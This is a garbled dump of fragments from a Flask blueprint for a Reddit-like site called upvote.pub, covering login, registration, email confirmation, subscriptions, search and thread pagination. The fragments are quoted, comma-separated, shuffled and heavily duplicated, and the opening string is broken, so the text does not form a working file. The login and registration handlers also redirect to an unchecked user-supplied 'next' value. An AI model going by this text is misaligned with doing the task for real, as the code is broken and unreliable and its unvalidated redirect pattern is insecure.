flash('Thanks for signing up! 
Please confirm your email", "and check_password_hash(user.password, form.password.data): # the session can't be modified as", "the confirmation email.', 'success') if 'next' in request.form and request.form['next']:", "comments \"\"\" query = request.args.get('query') page_title=f\"Search results for '{query}'\" rs", "send_email from base.utils.misc import random_string, validate_sort_type mod = Blueprint('frontends', __name__,", "= request.args.get('query') page_title=f\"Search results for '{query}'\" rs = search_module.search(query, orderby='creation',", "None if g.user: if request.form: form = subreddit_subs(request.form) if form.validate_on_submit():", "page=md, **md.metadata) @mod.route('/search/', methods=['GET']) def search(): \"\"\" Allows users to", "before_request(): g.user = None if session.get('user_id'): g.user = User.query.get(session['user_id']) def", "import check_password_hash, generate_password_hash from logzero import logger from base import", "request.args.get('query') page_title=f\"Search results for '{query}'\" rs = search_module.search(query, orderby='creation', search_title=True,", "redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong email or password', 'danger') return render_template(\"login.html\",", "set of subreddits subreddits = Subreddit.query.all() return subreddits def process_thread_paginator(trending=False,", "and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form, next=next)", "request.form: form = subreddit_subs(request.form) if form.validate_on_submit(): form_subs = form.data.get('subs') form_subs", "redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST']) def register(): \"\"\" Registration page \"\"\"", "== 'GET': if 'next' in request.args: next = request.args['next'] form", "you for confirming your email! You can now submit and", "line of code :) base_query = subreddit.threads if subreddit else", "session['user_id'] = user.id flash('Thanks for signing up! 
Please confirm your", "sub_form from base.utils.email import send_email from base.utils.misc import random_string, validate_sort_type", "import RegisterForm, LoginForm from base.users.models import User from base.threads.models import", "db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs)) else: subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs", "\"\"\" abstracted because many sources pull from a thread listing", "== 'new': base_query = base_query.order_by(db.desc(Thread.created_on)) elif sort_type == 'publication_date': base_query", "import Thread, Publication from base.subreddits.models import Subreddit from base.users.decorators import", "g.user: return redirect(url_for('frontends.home')) next = '' if request.method == 'GET':", "the link sent in the confirmation email.', 'success') if 'next'", "# quickly paginate some arbitrary data, no sorting if rs:", "quickly paginate some arbitrary data, no sorting if rs: thread_paginator", "# If the user is logged in send them home", "an user instance not yet stored in the database user", "import random_string, validate_sort_type mod = Blueprint('frontends', __name__, url_prefix='') @mod.before_request def", "'markdown-in-html']) return render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/', methods=['GET']) def search(): \"\"\"", "user.id if 'next' in request.form and request.form['next']: return redirect(request.form['next']) return", "werzeug to validate user's password if user and check_password_hash(user.password, form.password.data):", "listing source (subreddit permalink, homepage, etc) \"\"\" threads_per_page = 15", "= subreddit_subs(request.form) if form.validate_on_submit(): form_subs = form.data.get('subs') form_subs = list(set([x['sub_name']", "= g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs)) else: subs", "in request.args: next = request.args['next'] form = LoginForm(request.form) # make", "but doesn't validate password is right if form.validate_on_submit(): # continue", "# Filter by user subs logger.info(g.user) if g.user: subreddit_subs =", "as it's signed, # it's a safe place to store", "password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) # Insert the record in our database", "cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\"))", "a safe place to store the user id session['user_id'] =", "# create an user instance not yet stored in the", "paginate some arbitrary data, no sorting if rs: thread_paginator =", "don't override function name from base.users.forms import RegisterForm, LoginForm from", "= LoginForm(request.form) # make sure data is valid, but doesn't", "or 1 cur_page = int(cur_page) thread_paginator = None # if", "= f.read() md = markdown2.markdown(content, extras = ['fenced-code-blocks', 'nofollow', 'target-blank-links',", "home(sort_type='hot'): \"\"\" If not trending we order by creation date", "and comments \"\"\" query = request.args.get('query') page_title=f\"Search results for '{query}'\"", "Confirm user email \"\"\" user = User.query.filter_by(email_token=token).first() if user.email_token ==", "= base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if 
sort_type == 'hot': base_query =", "users to search threads and comments \"\"\" query = request.args.get('query')", "base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if sort_type == 'hot': base_query = base_query.order_by(db.desc(Thread.hotness))", "Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default set of subreddits subreddits = Subreddit.query.all()", "form.validate_on_submit(): # create an user instance not yet stored in", "validate password is right if form.validate_on_submit(): # continue where we", "= RegisterForm(request.form) if form.validate_on_submit(): # create an user instance not", "__name__, url_prefix='') @mod.before_request def before_request(): g.user = None if session.get('user_id'):", "logger.info(g.user) if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness))", "atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page): page_md = f\"base/markdown/{page}.md\"", "\"\"\" threads_per_page = 15 cur_page = request.args.get('page') or 1 cur_page", "orderby='creation', search_title=True, search_text=True) thread_paginator = process_thread_paginator(rs=rs) #rs = rs.all() num_searches", "base.users.models import User from base.threads.models import Thread, Publication from base.subreddits.models", "'r') as f: content = f.read() md = markdown2.markdown(content, extras", "render_template(\"register.html\", form=form, next=next) @mod.route('/subs/', methods=['GET', 'POST']) def view_all(): \"\"\" \"\"\"", "error_out=True) return thread_paginator @mod.route('/') def home(sort_type='hot'): \"\"\" If not trending", "not trending we order by creation date \"\"\" atom_url =", "order by creation date \"\"\" atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True)", "session.pop('user_id', None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token): \"\"\" Confirm user", "num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST']) def login(): \"\"\" We had to", "he now has an id db.session.commit() session['user_id'] = user.id flash('Thanks", "base_query = base_query.order_by(db.desc(Thread.created_on)) elif sort_type == 'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date))", "= True if request.path.endswith('trending') else False page_title = \"Trending\" if", "markdown2 from flask import (Blueprint, request, render_template, flash, g, session,", "for '{query}'\" rs = search_module.search(query, orderby='creation', search_title=True, search_text=True) thread_paginator =", "check_password_hash(user.password, form.password.data): # the session can't be modified as it's", "= form.data.get('subs') form_subs = list(set([x['sub_name'] for x in form_subs if", "in, as he now has an id db.session.commit() session['user_id'] =", "view_all(): \"\"\" \"\"\" subreddit_list = Subreddit.query.all() form = None if", "return redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong email or password', 'danger') return", "for subreddit in subreddit_list: sform = sub_form() sform.sub_name = subreddit.name", "If the user is logged in send them home return", "@mod.before_request def before_request(): g.user = None if session.get('user_id'): g.user =", "page_title = \"Trending\" if trending 
else \"Frontpage\" thread_paginator = process_thread_paginator(trending=trending)", "g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs)) else: subs =", "g.user = None if session.get('user_id'): g.user = User.query.get(session['user_id']) def home_subreddit():", "user subreddits otherwise fetch a list of defaults \"\"\" if", "Subs\", 'success') db.session.commit() else: form = subreddit_subs() for subreddit in", "db.session.commit() else: form = subreddit_subs() for subreddit in subreddit_list: sform", "confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) # Log the user in,", "= sub_form() sform.sub_name = subreddit.name sform.sub_group = subreddit.group if g.user:", "route the user back to his or her original place", "subreddit_subs = g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default set", "if rs: thread_paginator = rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator #", "elif sort_type == 'comments': base_query = base_query.order_by(db.desc(Thread.n_comments)) elif sort_type ==", "the database user = User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string())", "safe place to store the user id session['user_id'] = user.id", "email_confirm_link), user.email) # Log the user in, as he now", "methods=['GET', 'POST']) def register(): \"\"\" Registration page \"\"\" if g.user:", "sexy line of code :) base_query = subreddit.threads if subreddit", "15 cur_page = request.args.get('page') or 1 cur_page = int(cur_page) thread_paginator", "x in form_subs if x['value']])) g.user.subreddit_subs = {'subs': form_subs} flash(\"Updated", "form = subreddit_subs() for subreddit in subreddit_list: sform = sub_form()", "request.args.get('page') or 1 cur_page = int(cur_page) thread_paginator = None #", "that means we are just looking to # quickly paginate", "redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page): page_md = f\"base/markdown/{page}.md\" if not", "form = None if g.user: if request.form: form = subreddit_subs(request.form)", "to do some extra work to route the user back", "subreddit else Thread.query # Filter by user subs logger.info(g.user) if", "**md.metadata) @mod.route('/search/', methods=['GET']) def search(): \"\"\" Allows users to search", "'success') return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST']) def register(): \"\"\" Registration", "modified as it's signed, # it's a safe place to", "homepage, etc) \"\"\" threads_per_page = 15 cur_page = request.args.get('page') or", "num_searches = rs.count() subreddits = get_subreddits() return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(),", "flash, g, session, redirect, url_for, abort, Markup) from werkzeug import", "Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs def get_subreddits(): \"\"\" Fetch user subreddits", "f: content = f.read() md = markdown2.markdown(content, extras = ['fenced-code-blocks',", "for confirming your email! 
You can now submit and comment.\",", "subreddit_name='frontpage', _external=True) trending = True if request.path.endswith('trending') else False page_title", "@mod.route('/.xml') @mod.route('/.rss') def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page):", "session, redirect, url_for, abort, Markup) from werkzeug import check_password_hash, generate_password_hash", "token = user.email_token) email_response = send_email(\"Confirm upvote.pub email\", \"\"\"Please visit", "send_email(\"Confirm upvote.pub email\", \"\"\"Please visit the link below to confirm", "flash('Thanks for signing up! Please confirm your email by following", "'nofollow', 'target-blank-links', 'toc', 'tables', 'footnotes', 'metadata', 'markdown-in-html']) return render_template('markdown.html', page=md,", "'hot': base_query = base_query.order_by(db.desc(Thread.hotness)) elif sort_type == 'top': base_query =", "return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token): \"\"\" Confirm user email \"\"\"", "base_query.order_by(db.desc(Thread.created_on)) elif sort_type == 'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator =", "g, session, redirect, url_for, abort, Markup) from werkzeug import check_password_hash,", "'{query}'\" rs = search_module.search(query, orderby='creation', search_title=True, search_text=True) thread_paginator = process_thread_paginator(rs=rs)", "if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: #", "Subreddit from base.users.decorators import requires_login from base.utils.user_utils import get_school from", "yet stored in the database user = User(username=form.username.data, email=form.email.data, \\", "for signing up! 
Please confirm your email by following the", "code :) base_query = subreddit.threads if subreddit else Thread.query #", "make sure data is valid, but doesn't validate password is", "continue where we left off if so user = User.query.filter_by(email=form.email.data).first()", "confirm your email by following the link sent in the", "search(): \"\"\" Allows users to search threads and comments \"\"\"", "logzero import logger from base import db, app from base", "if form.validate_on_submit(): form_subs = form.data.get('subs') form_subs = list(set([x['sub_name'] for x", "per_page=threads_per_page, error_out=True) return thread_paginator # sexy line of code :)", "return render_template(\"login.html\", form=form, next=next) @mod.route('/logout/', methods=['GET', 'POST']) @requires_login def logout():", "date \"\"\" atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending = True", "def login(): \"\"\" We had to do some extra work", "for x in form_subs if x['value']])) g.user.subreddit_subs = {'subs': form_subs}", "from werkzeug import check_password_hash, generate_password_hash from logzero import logger from", "some extra work to route the user back to his", "if so user = User.query.filter_by(email=form.email.data).first() # we use werzeug to", "permalink, homepage, etc) \"\"\" threads_per_page = 15 cur_page = request.args.get('page')", "trending else \"Frontpage\" thread_paginator = process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url, page_title=page_title,", "\"\"\" if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else:", "@mod.route('/subs/', methods=['GET', 'POST']) def view_all(): \"\"\" \"\"\" subreddit_list = Subreddit.query.all()", "search_module # don't override function name from base.users.forms import RegisterForm,", "search threads and comments \"\"\" query = request.args.get('query') page_title=f\"Search results", "his or her original place before logging in \"\"\" if", "Publication from base.subreddits.models import Subreddit from base.users.decorators import requires_login from", "'success') db.session.commit() else: form = subreddit_subs() for subreddit in subreddit_list:", "user email \"\"\" user = User.query.filter_by(email_token=token).first() if user.email_token == token:", "otherwise fetch a list of defaults \"\"\" if g.get('user'): subreddit_subs", "= base_query.order_by(db.desc(Thread.created_on)) elif sort_type == 'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator", "subreddit_list = Subreddit.query.all() form = None if g.user: if request.form:", "# Sorting if sort_type == 'hot': base_query = base_query.order_by(db.desc(Thread.hotness)) elif", "import subreddit_subs, sub_form from base.utils.email import send_email from base.utils.misc import", "@requires_login def logout(): session.pop('user_id', None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token):", "base.threads.models import Thread, Publication from base.subreddits.models import Subreddit from base.users.decorators", "if request.path.endswith('trending') else False page_title = \"Trending\" if trending else", "g.user = User.query.get(session['user_id']) def home_subreddit(): logger.info(g.user) if g.get('user'): subreddit_subs =", "get_school from base.subreddits.forms import subreddit_subs, sub_form from 
base.utils.email import send_email", "@mod.route('/search/', methods=['GET']) def search(): \"\"\" Allows users to search threads", "def search(): \"\"\" Allows users to search threads and comments", "werkzeug import check_password_hash, generate_password_hash from logzero import logger from base", "user's password if user and check_password_hash(user.password, form.password.data): # the session", "# -*- coding: utf-8 -*- \"\"\" \"\"\" import os import", "request.method == 'GET': if 'next' in request.args: next = request.args['next']", "# if we are passing in a resultset, that means", "looking to # quickly paginate some arbitrary data, no sorting", "== 'top': base_query = base_query.order_by(db.desc(Thread.votes)) elif sort_type == 'comments': base_query", "= g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default set of", "= list(set([x['sub_name'] for x in form_subs if x['value']])) g.user.subreddit_subs =", "g.user.subreddit_subs = {'subs': form_subs} flash(\"Updated Subs\", 'success') db.session.commit() else: form", "subreddits subreddits = Subreddit.query.all() return subreddits def process_thread_paginator(trending=False, rs=None, subreddit=None,", "User.query.get(session['user_id']) def home_subreddit(): logger.info(g.user) if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subs", "up! Please confirm your email by following the link sent", "in subreddit_list: sform = sub_form() sform.sub_name = subreddit.name sform.sub_group =", "@mod.route('/logout/', methods=['GET', 'POST']) @requires_login def logout(): session.pop('user_id', None) return redirect(url_for('frontends.home'))", "g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default set of subreddits", "= subreddit.group if g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform) return render_template('subreddits/subs.html',", "rs.count() subreddits = get_subreddits() return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches)", "thread_paginator = process_thread_paginator(rs=rs) #rs = rs.all() num_searches = rs.count() subreddits", "subs def get_subreddits(): \"\"\" Fetch user subreddits otherwise fetch a", "if request.method == 'GET': if 'next' in request.args: next =", "== token: user.email_verified = True db.session.commit() flash(\"Thank you for confirming", "link sent in the confirmation email.', 'success') if 'next' in", "per_page=threads_per_page, error_out=True) return thread_paginator @mod.route('/') def home(sort_type='hot'): \"\"\" If not", "email\", \"\"\"Please visit the link below to confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"),", "flash(\"Thank you for confirming your email! 
You can now submit", "# the session can't be modified as it's signed, #", "confirmation email.', 'success') if 'next' in request.form and request.form['next']: return", "g.user: subreddit_subs = g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if", "= User.query.get(session['user_id']) def home_subreddit(): logger.info(g.user) if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs')", "base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator @mod.route('/') def home(sort_type='hot'): \"\"\" If", "f.read() md = markdown2.markdown(content, extras = ['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc',", "if we are passing in a resultset, that means we", "confirming your email! You can now submit and comment.\", 'success')", "validate user's password if user and check_password_hash(user.password, form.password.data): # the", "if not os.path.exists(page_md): abort(404) with open(page_md, 'r') as f: content", "= \"Trending\" if trending else \"Frontpage\" thread_paginator = process_thread_paginator(trending=trending) return", "page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\",", "some arbitrary data, no sorting if rs: thread_paginator = rs.paginate(cur_page,", "to route the user back to his or her original", "is valid, but doesn't validate password is right if form.validate_on_submit():", "signed, # it's a safe place to store the user", "LoginForm from base.users.models import User from base.threads.models import Thread, Publication", "== 'hot': base_query = base_query.order_by(db.desc(Thread.hotness)) elif sort_type == 'top': base_query", "= process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml')", "= ['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc', 'tables', 'footnotes', 'metadata', 'markdown-in-html']) return", "from base.users.models import User from base.threads.models import Thread, Publication from", "threads_per_page = 15 cur_page = request.args.get('page') or 1 cur_page =", "True if request.path.endswith('trending') else False page_title = \"Trending\" if trending", "form.validate_on_submit(): form_subs = form.data.get('subs') form_subs = list(set([x['sub_name'] for x in", "= base_query.order_by(db.desc(Thread.n_comments)) elif sort_type == 'new': base_query = base_query.order_by(db.desc(Thread.created_on)) elif", "= url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending = True if request.path.endswith('trending') else", "open(page_md, 'r') as f: content = f.read() md = markdown2.markdown(content,", "pull from a thread listing source (subreddit permalink, homepage, etc)", "from base import search as search_module # don't override function", "if g.user: return redirect(url_for('frontends.home')) next = '' if request.method ==", "'success') if 'next' in request.form and request.form['next']: return redirect(request.form['next']) return", "import (Blueprint, request, render_template, flash, g, session, redirect, url_for, abort,", "# sexy line of code :) base_query = subreddit.threads if", "base.subreddits.forms import subreddit_subs, sub_form from base.utils.email 
import send_email from base.utils.misc", "= rs.count() subreddits = get_subreddits() return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator,", "'comments': base_query = base_query.order_by(db.desc(Thread.n_comments)) elif sort_type == 'new': base_query =", "because many sources pull from a thread listing source (subreddit", "# Default set of subreddits subreddits = Subreddit.query.all() return subreddits", "methods=['GET']) def search(): \"\"\" Allows users to search threads and", "subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs)) else: subs = Thread.query.order_by(db.desc(Thread.hotness),", "g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default", "or her original place before logging in \"\"\" if g.user:", "token: user.email_verified = True db.session.commit() flash(\"Thank you for confirming your", "1 cur_page = int(cur_page) thread_paginator = None # if we", "= subreddit.threads if subreddit else Thread.query # Filter by user", "import Subreddit from base.users.decorators import requires_login from base.utils.user_utils import get_school", "next=next) @mod.route('/subs/', methods=['GET', 'POST']) def view_all(): \"\"\" \"\"\" subreddit_list =", "not os.path.exists(page_md): abort(404) with open(page_md, 'r') as f: content =", "original place before logging in \"\"\" if g.user: return redirect(url_for('frontends.home'))", "sure data is valid, but doesn't validate password is right", "if sort_type == 'hot': base_query = base_query.order_by(db.desc(Thread.hotness)) elif sort_type ==", "#rs = rs.all() num_searches = rs.count() subreddits = get_subreddits() return", "subreddit.name sform.sub_group = subreddit.group if g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform)", "os.path.exists(page_md): abort(404) with open(page_md, 'r') as f: content = f.read()", "we are just looking to # quickly paginate some arbitrary", "else: subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs def get_subreddits(): \"\"\"", "def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page): page_md =", "return redirect(request.form['next']) return redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form, next=next) @mod.route('/subs/', methods=['GET',", "request, render_template, flash, g, session, redirect, url_for, abort, Markup) from", "a resultset, that means we are just looking to #", "import os import markdown2 from flask import (Blueprint, request, render_template,", "extra work to route the user back to his or", "email or password', 'danger') return render_template(\"login.html\", form=form, next=next) @mod.route('/logout/', methods=['GET',", "abstracted because many sources pull from a thread listing source", "request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong email or", "list(set([x['sub_name'] for x in form_subs if x['value']])) g.user.subreddit_subs = {'subs':", "base_query = base_query.order_by(db.desc(Thread.votes)) elif sort_type == 'comments': base_query = base_query.order_by(db.desc(Thread.n_comments))", "the link below to confirm your 
email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) #", "off if so user = User.query.filter_by(email=form.email.data).first() # we use werzeug", "subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default set of subreddits subreddits", "os import markdown2 from flask import (Blueprint, request, render_template, flash,", "submit and comment.\", 'success') return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST']) def", "render_template(\"login.html\", form=form, next=next) @mod.route('/logout/', methods=['GET', 'POST']) @requires_login def logout(): session.pop('user_id',", "if form.validate_on_submit(): # continue where we left off if so", "def view_all(): \"\"\" \"\"\" subreddit_list = Subreddit.query.all() form = None", "store the user id session['user_id'] = user.id if 'next' in", "as f: content = f.read() md = markdown2.markdown(content, extras =", "= User.query.filter_by(email=form.email.data).first() # we use werzeug to validate user's password", "search_module.search(query, orderby='creation', search_title=True, search_text=True) thread_paginator = process_thread_paginator(rs=rs) #rs = rs.all()", "sent in the confirmation email.', 'success') if 'next' in request.form", "email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) # Log the user in, as he", "password', 'danger') return render_template(\"login.html\", form=form, next=next) @mod.route('/logout/', methods=['GET', 'POST']) @requires_login", "request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form, next=next) @mod.route('/subs/',", "page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST']) def login(): \"\"\"", "to store the user id session['user_id'] = user.id if 'next'", "name from base.users.forms import RegisterForm, LoginForm from base.users.models import User", "db.session.commit() flash(\"Thank you for confirming your email! 
You can now", "LoginForm(request.form) # make sure data is valid, but doesn't validate", "as he now has an id db.session.commit() session['user_id'] = user.id", "import send_email from base.utils.misc import random_string, validate_sort_type mod = Blueprint('frontends',", "\"\"\" \"\"\" import os import markdown2 from flask import (Blueprint,", "process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss')", "\"\"\" Allows users to search threads and comments \"\"\" query", "login(): \"\"\" We had to do some extra work to", "base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator @mod.route('/') def", "user subs logger.info(g.user) if g.user: subreddit_subs = g.user.subreddit_subs.get('subs') base_query =", "db.session.add(user) email_confirm_link = url_for('frontends.confirm_email', token = user.email_token) email_response = send_email(\"Confirm", "it db.session.add(user) email_confirm_link = url_for('frontends.confirm_email', token = user.email_token) email_response =", "'next' in request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) return", "sort_type == 'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page,", "= None if g.user: if request.form: form = subreddit_subs(request.form) if", "'next' in request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong", "stored in the database user = User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data),", "to confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) # Log the user", "'danger') return render_template(\"login.html\", form=form, next=next) @mod.route('/logout/', methods=['GET', 'POST']) @requires_login def", "base.utils.email import send_email from base.utils.misc import random_string, validate_sort_type mod =", "def home(sort_type='hot'): \"\"\" If not trending we order by creation", "generate_password_hash from logzero import logger from base import db, app", "if 'next' in request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home'))", "= process_thread_paginator(rs=rs) #rs = rs.all() num_searches = rs.count() subreddits =", "below to confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) # Log the", "user back to his or her original place before logging", "False page_title = \"Trending\" if trending else \"Frontpage\" thread_paginator =", "atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def atom_redirect(): return", "creation date \"\"\" atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending =", "-*- \"\"\" \"\"\" import os import markdown2 from flask import", "= base_query.order_by(db.desc(Thread.hotness)) elif sort_type == 'top': base_query = base_query.order_by(db.desc(Thread.votes)) 
elif", "form = LoginForm(request.form) # make sure data is valid, but", "the user is logged in send them home return redirect(url_for('frontends.home'))", "instance not yet stored in the database user = User(username=form.username.data,", "return subs def get_subreddits(): \"\"\" Fetch user subreddits otherwise fetch", "= search_module.search(query, orderby='creation', search_title=True, search_text=True) thread_paginator = process_thread_paginator(rs=rs) #rs =", "subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs def get_subreddits(): \"\"\" Fetch", "from base import db, app from base import search as", "resultset, that means we are just looking to # quickly", "else: # Default set of subreddits subreddits = Subreddit.query.all() return", "place before logging in \"\"\" if g.user: return redirect(url_for('frontends.home')) next", "@mod.route('/register/', methods=['GET', 'POST']) def register(): \"\"\" Registration page \"\"\" if", "link below to confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) # Log", "abort(404) with open(page_md, 'r') as f: content = f.read() md", "== 'comments': base_query = base_query.order_by(db.desc(Thread.n_comments)) elif sort_type == 'new': base_query", "import db, app from base import search as search_module #", "return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page): page_md = f\"base/markdown/{page}.md\" if", "app from base import search as search_module # don't override", "page_md = f\"base/markdown/{page}.md\" if not os.path.exists(page_md): abort(404) with open(page_md, 'r')", "user.email_token) email_response = send_email(\"Confirm upvote.pub email\", \"\"\"Please visit the link", "else False page_title = \"Trending\" if trending else \"Frontpage\" thread_paginator", "user is logged in send them home return redirect(url_for('frontends.home')) next", "thread_paginator = rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator # sexy line", "with open(page_md, 'r') as f: content = f.read() md =", "user instance not yet stored in the database user =", "from base.threads.models import Thread, Publication from base.subreddits.models import Subreddit from", "redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token): \"\"\" Confirm user email \"\"\" user", "\\ .filter(Subreddit.name.in_(subreddit_subs)) else: subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs def", "g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs))", "back to his or her original place before logging in", "\"\"\" If not trending we order by creation date \"\"\"", "id db.session.commit() session['user_id'] = user.id flash('Thanks for signing up! 
